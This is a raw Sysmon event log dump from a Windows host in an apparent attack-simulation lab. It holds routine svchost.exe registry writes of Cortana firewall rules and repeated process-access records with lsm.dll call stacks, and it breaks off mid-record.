13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F2453044-1613-4AC6-A75D-CC6B7EF13C2B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C351D152-24DE-4BFE-8ECB-B4EDC98B8367}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 13241300x800000000000000010700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{374DAA60-FD2D-429E-89D1-2D6C8D4F6FF9}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.977{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{E5FB4F7F-5604-4310-A7FC-3E188A2CBB2A}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Security=Authenticate| 13241300x800000000000000010698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{4683413D-3BD0-4208-952F-0348ABF4134F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{DBDF160F-57DD-401E-907E-451C865C0799}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C2B1AEE4-901E-47A0-AC4B-9875C605F362}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{14E26735-492C-4F05-ACD2-9DAD9E15FD8B}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|EmbedCtxt=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}| 10341000x800000000000000010687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.961{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 